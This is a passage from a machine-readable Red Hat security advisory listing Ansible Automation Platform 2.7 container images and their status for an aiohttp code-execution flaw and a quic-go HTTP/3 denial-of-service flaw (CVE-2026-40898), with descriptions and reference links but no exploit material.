"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9@sha256:afc4a5e6ac70b810b36cb189ae7f38171de5323435fddaaed6529d755de1dd31_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-rhel9-operator@sha256:3f81691da61b84cf746d59516bb44ab6a5446742366d196591b3ba331832e913_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-rhel9-operator@sha256:8e6e40bde2eda8ccf3878d4831ffc39d1788830996fc990d657f0dad785810df_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-runner-rhel9@sha256:92f6621b8787535a9f961f9515bd56dcac2f1e5394d3f8d731896c0e48307849_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-runner-rhel9@sha256:a5800a87d81d83b9af7b8b01fb211e1bc7f3c26f5e0d047eaf3caa0aa1a0fe7c_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/receptor-rhel9@sha256:72ca7471ef1f86bea7d278c5d4b45131ccd267e2f331d3a6116eab92d3c41b60_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/receptor-rhel9@sha256:90879e56946584dc063eb98982681e6400b728c490d46d05cc6a0371dff33bcd_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:9d80aff1ca83a4db2be8ffac510831f6c4a6547d7b7a57f1422613a342ed5b2a_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:fa0004bd6ec92544414d42a881421a41d8679fa9676bea2d641c6d1c10cad8e1_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "aiohttp: AIOHTTP: Arbitrary code execution via untrusted input to CookieJar.load()"
},
{
"cve": "CVE-2026-40898",
"cwe": {
"id": "CWE-770",
"name": "Allocation of Resources Without Limits or Throttling"
},
"discovery_date": "2026-06-04T19:00:56.584166+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/aap-must-gather-rhel9@sha256:af38581c04caff4c124a2a5cc0dbbc29a35d59136a72149c88341d5130ec115c_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/aap-must-gather-rhel9@sha256:fc4564a19e737e01f69a8ffc7f609cfc00cbe78ecbd0202e21580798e0fad5b0_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-builder-rhel9@sha256:bad1cfd25c0a76284bca0d4e7b2997d1c19cf534a090c023818d7636c02b1d5a_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-builder-rhel9@sha256:d997409acf678f6741759e71663564fce7f9dbf36ba9c3efa4095514c365c8f8_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-dev-tools-rhel9@sha256:f66f5e6d6765f1e59a21da1f3ccb57c5c9d5a385b3a6ff359301e1dcbaf992d2_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-dev-tools-rhel9@sha256:f7d315beff91d5327f4c3ec3a5d95db462723d0c177023eee11b168381153a2b_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-devspaces-rhel9@sha256:5c57cc4b1591620c23e4d09d7452d560c344651f1c2a6559597b8a86901d7270_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-devspaces-rhel9@sha256:dd6396d101bf72b073914a91fa8621114060b83a6398dbaceacf60e550370058_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9-operator@sha256:5af18e0dfbddd146401125d1af25e02fbcd5c9c9c99f8b3463035ce8e8dfc88a_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9-operator@sha256:d6ed231018aba445d42efaee38d156e3210029f914bcc7f41145c76063f179c6_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9@sha256:49603d8eb1133ff25d77932418445b3399d56696b91575f404d54bd66f2abdf1_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9@sha256:cb6992dd9e3b8ff0cd5a96c7d72c2bd543a3ca388fbf87efec36aa4f1c170fe4_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-minimal-rhel9@sha256:b08e64bb465fc4873e0822456a4b0bb3feb212f51f2629b751c5bf11b5952136_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-minimal-rhel9@sha256:f1a964f105f950060df297d60d49dadefadfc04a98e4196379e3c48590aabf5a_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-supported-rhel9@sha256:214c8d370aff0f8260169e1092e630dd28d6b332da142d055c97e6ed906bd5d2_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-supported-rhel9@sha256:603d5e810f3d05b36135d5155cea52d575dd6314354f42439c00c4d744a154ec_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9-operator@sha256:3a76538670407269fba45d8e9ba3c6b5067b6b19c4538fc837f3b167adf33de1_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9-operator@sha256:e07554775d76ffbfe312399cfa7469d444bcfb3486ff4d42ba64dc10d10c95b2_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9@sha256:0e5b8ea19aaf599851b6d3c33f157fed70d6889c21f3b7dda42cc0aaee45e40a_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9@sha256:665bc156c655ca4ed0021bffbabb1d2c7d0a5541582ea63287fcf7d2c3bbf89c_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-ui-rhel9@sha256:4087572ac03600b6516526a78d5b4b093c943a6fd0a120c892d58df2a3118881_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-ui-rhel9@sha256:4589dd9e21834c2d4f61712256d3e69b473fbe01c118c46e7c796c39715d3060_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:1b29c33260a34d319581e3ad50436ba331ae2d1ff957c67184a253f084c86441_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:4a3de7687c2f4014016918f800f8edc3727f58e10f91516e38e5a5a1a6aa60d1_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:d0d43952f6566605feb98ecab51ebafb6a97f23fd7ecee8e1a88af6b495683f9_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:fb1c1bdc24278bee7dfc433af498acac5fbc440ee919568254adb3ee9973f978_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-supported-rhel9@sha256:35caea9f2f5102fb4088201ba4a96a8c3eab4dfae0facf03ed2a58aeb0ce4549_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-supported-rhel9@sha256:bf55509be1d47b9f644c647f32bc3db8c618ae87a921aaac87003b420e0266d7_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-proxy-rhel9@sha256:6706769c9e9e74957c01991b8ebe5fbce625b39ba762af1ad9989f11df0b8cf6_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-proxy-rhel9@sha256:6c459fcb4f7ad8329dd17305d5370c022551e477dae49d14886d8293f13b1dc8_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9-operator@sha256:b2979d79d95d2777e16c605ad777bd36d119a035bf10a94e8819cb0909ca5626_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9-operator@sha256:df86e008f172ea7f739740b110ab36e53b6120dd600ff86808f56a2a33e32602_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9@sha256:76d0b913ad8e793136a5fff697eb39e13de1616bb10503a4158e857bc3264ef3_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9@sha256:8471b0b7b66309f346fe83e0a05ce968dcb9b55c2510e1f269c05b4aa87ed356_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9-operator@sha256:0cf7e473d3c463bf1498d2a1f3ba31c64085e06bd1dc0db844432c13325dcdc0_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9-operator@sha256:f3d880f509faaf37b20dbd2225d9868ec6e08b9998b7207734a9265f4cb33b95_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9@sha256:6380adee2c6fa3c298d84db8c1a1f01f7dcab2bfd8b9476c127bdb4a67217c55_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9@sha256:b5400bb64dad7ce8aeed803b420c405bfe55cef08a28b9ac27e6c553c1bdf139_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-web-rhel9@sha256:48479bf2f5bb4ddff65668c351521fdfbf95d662e54543854ec80f17a1295439_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-web-rhel9@sha256:fc27fd49722a7a5b862928070b314f850b8d0e4385fec786d1914c0135e8e5fa_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-chatbot-rhel9@sha256:500c52d19ddfb4cd15e4ba0c94268250d5d83442c2c67381b3cb9bb7613c23d4_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-chatbot-rhel9@sha256:d2025c6e5fba7b87bbbbe71587a9332167e52301f4c55ee99ee02aa65cf9c404_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9-operator@sha256:5b3249e40859207e408f108ff90ba1eafb396f614ee031ab489ae48f1455d617_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9-operator@sha256:96ae0e2320d459611d674d18dec02c0eb31f6534407f6758004d8f74078b41ce_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9@sha256:a9d59bb30f983980d8d59ef97f54dbf5427cfd1a24210aa5843be4ddf0f74143_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9@sha256:ce712ba0cc8e800babf1c1f013e95c4fc3d9ff6bc6f4230455567ba2974de890_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-server-rhel9@sha256:470f289922f14644f0b9bda434d7001608818466703dab8de333bc02a4f79573_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-server-rhel9@sha256:d014d2eafa11bbff61ef871608ab3cd332602b9138e9505d40521a67a6162400_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-tools-rhel9@sha256:79d9bcdc9f2a45950eb3b511b7a3c2224592be0cf560af467887c70ca74a41ab_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-tools-rhel9@sha256:b0814ef140b9746de9c081bdb18067ea16de065ac2d7a984c2a9c59bb4357709_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9-operator@sha256:72c11674295ce5a7daa2c63dc7d4a63654912a5131391ccb2827223e5957ea05_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9-operator@sha256:78f3a98b9c8e028a461afd11e000f3f8a75d5f05f326bf0acd6c859dfd606ed8_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9@sha256:551f489eccb8e97cd6f03de46f5fc8cc051fe4af717d8de272a3b06648cb771c_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9@sha256:afc4a5e6ac70b810b36cb189ae7f38171de5323435fddaaed6529d755de1dd31_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-rhel9-operator@sha256:3f81691da61b84cf746d59516bb44ab6a5446742366d196591b3ba331832e913_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-rhel9-operator@sha256:8e6e40bde2eda8ccf3878d4831ffc39d1788830996fc990d657f0dad785810df_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-runner-rhel9@sha256:92f6621b8787535a9f961f9515bd56dcac2f1e5394d3f8d731896c0e48307849_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-runner-rhel9@sha256:a5800a87d81d83b9af7b8b01fb211e1bc7f3c26f5e0d047eaf3caa0aa1a0fe7c_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:9d80aff1ca83a4db2be8ffac510831f6c4a6547d7b7a57f1422613a342ed5b2a_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:fa0004bd6ec92544414d42a881421a41d8679fa9676bea2d641c6d1c10cad8e1_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2484875"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in quic-go, an implementation of the QUIC protocol in Go. A remote attacker can exploit this by sending specially crafted HTTP/3 trailer fields. This can cause the system to allocate excessive memory, leading to a denial-of-service (DoS) condition where the affected server or client may crash or run out of resources.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "github.com/quic-go/quic-go: quic-go: Denial of Service via excessive memory allocation in HTTP/3 trailers",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This is an Important denial-of-service flaw in `quic-go` that allows a remote attacker to exhaust system memory by sending specially crafted HTTP/3 trailer fields. This can lead to crashes or resource unavailability in affected Red Hat products utilizing `quic-go` for HTTP/3 communication, impacting both client and server implementations.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/receptor-rhel9@sha256:72ca7471ef1f86bea7d278c5d4b45131ccd267e2f331d3a6116eab92d3c41b60_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/receptor-rhel9@sha256:90879e56946584dc063eb98982681e6400b728c490d46d05cc6a0371dff33bcd_arm64"
],
"known_not_affected": [
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/aap-must-gather-rhel9@sha256:af38581c04caff4c124a2a5cc0dbbc29a35d59136a72149c88341d5130ec115c_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/aap-must-gather-rhel9@sha256:fc4564a19e737e01f69a8ffc7f609cfc00cbe78ecbd0202e21580798e0fad5b0_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-builder-rhel9@sha256:bad1cfd25c0a76284bca0d4e7b2997d1c19cf534a090c023818d7636c02b1d5a_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-builder-rhel9@sha256:d997409acf678f6741759e71663564fce7f9dbf36ba9c3efa4095514c365c8f8_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-dev-tools-rhel9@sha256:f66f5e6d6765f1e59a21da1f3ccb57c5c9d5a385b3a6ff359301e1dcbaf992d2_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-dev-tools-rhel9@sha256:f7d315beff91d5327f4c3ec3a5d95db462723d0c177023eee11b168381153a2b_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-devspaces-rhel9@sha256:5c57cc4b1591620c23e4d09d7452d560c344651f1c2a6559597b8a86901d7270_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-devspaces-rhel9@sha256:dd6396d101bf72b073914a91fa8621114060b83a6398dbaceacf60e550370058_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9-operator@sha256:5af18e0dfbddd146401125d1af25e02fbcd5c9c9c99f8b3463035ce8e8dfc88a_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9-operator@sha256:d6ed231018aba445d42efaee38d156e3210029f914bcc7f41145c76063f179c6_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9@sha256:49603d8eb1133ff25d77932418445b3399d56696b91575f404d54bd66f2abdf1_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9@sha256:cb6992dd9e3b8ff0cd5a96c7d72c2bd543a3ca388fbf87efec36aa4f1c170fe4_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-minimal-rhel9@sha256:b08e64bb465fc4873e0822456a4b0bb3feb212f51f2629b751c5bf11b5952136_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-minimal-rhel9@sha256:f1a964f105f950060df297d60d49dadefadfc04a98e4196379e3c48590aabf5a_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-supported-rhel9@sha256:214c8d370aff0f8260169e1092e630dd28d6b332da142d055c97e6ed906bd5d2_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-supported-rhel9@sha256:603d5e810f3d05b36135d5155cea52d575dd6314354f42439c00c4d744a154ec_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9-operator@sha256:3a76538670407269fba45d8e9ba3c6b5067b6b19c4538fc837f3b167adf33de1_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9-operator@sha256:e07554775d76ffbfe312399cfa7469d444bcfb3486ff4d42ba64dc10d10c95b2_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9@sha256:0e5b8ea19aaf599851b6d3c33f157fed70d6889c21f3b7dda42cc0aaee45e40a_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9@sha256:665bc156c655ca4ed0021bffbabb1d2c7d0a5541582ea63287fcf7d2c3bbf89c_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-ui-rhel9@sha256:4087572ac03600b6516526a78d5b4b093c943a6fd0a120c892d58df2a3118881_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-ui-rhel9@sha256:4589dd9e21834c2d4f61712256d3e69b473fbe01c118c46e7c796c39715d3060_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:1b29c33260a34d319581e3ad50436ba331ae2d1ff957c67184a253f084c86441_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:4a3de7687c2f4014016918f800f8edc3727f58e10f91516e38e5a5a1a6aa60d1_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:d0d43952f6566605feb98ecab51ebafb6a97f23fd7ecee8e1a88af6b495683f9_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:fb1c1bdc24278bee7dfc433af498acac5fbc440ee919568254adb3ee9973f978_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-supported-rhel9@sha256:35caea9f2f5102fb4088201ba4a96a8c3eab4dfae0facf03ed2a58aeb0ce4549_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-supported-rhel9@sha256:bf55509be1d47b9f644c647f32bc3db8c618ae87a921aaac87003b420e0266d7_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-proxy-rhel9@sha256:6706769c9e9e74957c01991b8ebe5fbce625b39ba762af1ad9989f11df0b8cf6_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-proxy-rhel9@sha256:6c459fcb4f7ad8329dd17305d5370c022551e477dae49d14886d8293f13b1dc8_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9-operator@sha256:b2979d79d95d2777e16c605ad777bd36d119a035bf10a94e8819cb0909ca5626_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9-operator@sha256:df86e008f172ea7f739740b110ab36e53b6120dd600ff86808f56a2a33e32602_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9@sha256:76d0b913ad8e793136a5fff697eb39e13de1616bb10503a4158e857bc3264ef3_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9@sha256:8471b0b7b66309f346fe83e0a05ce968dcb9b55c2510e1f269c05b4aa87ed356_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9-operator@sha256:0cf7e473d3c463bf1498d2a1f3ba31c64085e06bd1dc0db844432c13325dcdc0_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9-operator@sha256:f3d880f509faaf37b20dbd2225d9868ec6e08b9998b7207734a9265f4cb33b95_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9@sha256:6380adee2c6fa3c298d84db8c1a1f01f7dcab2bfd8b9476c127bdb4a67217c55_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9@sha256:b5400bb64dad7ce8aeed803b420c405bfe55cef08a28b9ac27e6c553c1bdf139_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-web-rhel9@sha256:48479bf2f5bb4ddff65668c351521fdfbf95d662e54543854ec80f17a1295439_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-web-rhel9@sha256:fc27fd49722a7a5b862928070b314f850b8d0e4385fec786d1914c0135e8e5fa_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-chatbot-rhel9@sha256:500c52d19ddfb4cd15e4ba0c94268250d5d83442c2c67381b3cb9bb7613c23d4_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-chatbot-rhel9@sha256:d2025c6e5fba7b87bbbbe71587a9332167e52301f4c55ee99ee02aa65cf9c404_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9-operator@sha256:5b3249e40859207e408f108ff90ba1eafb396f614ee031ab489ae48f1455d617_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9-operator@sha256:96ae0e2320d459611d674d18dec02c0eb31f6534407f6758004d8f74078b41ce_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9@sha256:a9d59bb30f983980d8d59ef97f54dbf5427cfd1a24210aa5843be4ddf0f74143_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9@sha256:ce712ba0cc8e800babf1c1f013e95c4fc3d9ff6bc6f4230455567ba2974de890_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-server-rhel9@sha256:470f289922f14644f0b9bda434d7001608818466703dab8de333bc02a4f79573_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-server-rhel9@sha256:d014d2eafa11bbff61ef871608ab3cd332602b9138e9505d40521a67a6162400_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-tools-rhel9@sha256:79d9bcdc9f2a45950eb3b511b7a3c2224592be0cf560af467887c70ca74a41ab_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-tools-rhel9@sha256:b0814ef140b9746de9c081bdb18067ea16de065ac2d7a984c2a9c59bb4357709_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9-operator@sha256:72c11674295ce5a7daa2c63dc7d4a63654912a5131391ccb2827223e5957ea05_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9-operator@sha256:78f3a98b9c8e028a461afd11e000f3f8a75d5f05f326bf0acd6c859dfd606ed8_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9@sha256:551f489eccb8e97cd6f03de46f5fc8cc051fe4af717d8de272a3b06648cb771c_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9@sha256:afc4a5e6ac70b810b36cb189ae7f38171de5323435fddaaed6529d755de1dd31_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-rhel9-operator@sha256:3f81691da61b84cf746d59516bb44ab6a5446742366d196591b3ba331832e913_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-rhel9-operator@sha256:8e6e40bde2eda8ccf3878d4831ffc39d1788830996fc990d657f0dad785810df_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-runner-rhel9@sha256:92f6621b8787535a9f961f9515bd56dcac2f1e5394d3f8d731896c0e48307849_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-runner-rhel9@sha256:a5800a87d81d83b9af7b8b01fb211e1bc7f3c26f5e0d047eaf3caa0aa1a0fe7c_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:9d80aff1ca83a4db2be8ffac510831f6c4a6547d7b7a57f1422613a342ed5b2a_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:fa0004bd6ec92544414d42a881421a41d8679fa9676bea2d641c6d1c10cad8e1_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-40898"
},
{
"category": "external",
"summary": "RHBZ#2484875",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2484875"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-40898",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-40898"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-40898",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-40898"
},
{
"category": "external",
"summary": "https://github.com/quic-go/quic-go/releases/tag/v0.59.1",
"url": "https://github.com/quic-go/quic-go/releases/tag/v0.59.1"
},
{
"category": "external",
"summary": "https://github.com/quic-go/quic-go/security/advisories/GHSA-vvgj-x9jq-8cj9",
